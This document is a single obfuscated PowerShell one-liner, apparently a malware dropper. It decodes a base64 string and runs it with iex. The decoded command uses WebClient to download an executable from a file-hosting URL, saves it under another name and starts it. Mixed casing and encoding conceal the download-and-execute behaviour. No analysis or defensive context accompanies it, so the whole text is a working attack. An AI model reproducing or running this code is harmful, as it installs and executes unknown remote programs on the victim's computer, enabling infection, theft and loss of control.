iex([SYsTeM.teXT.enCodING]::utF8.GEtStrInG([systEM.coNverT]::frOMBasE64STrInG('CihOZXctT2JqZWN0IFNZU3RlbS5OZVQuV0ViQ0xpZU5UKS5kb1dOTE9hZEZpTEUoJ2h0dHA6Ly9kZGwzLmRhdGEuaHUvZ2V0LzAvOTU1MTE2Mi9za2UuZXhlJywnZmxlZWJsZS5leGUnKTtTdGFydC1Qcm9jZXNzICdmbGVlYmxlLmV4ZScKCg==')));exit
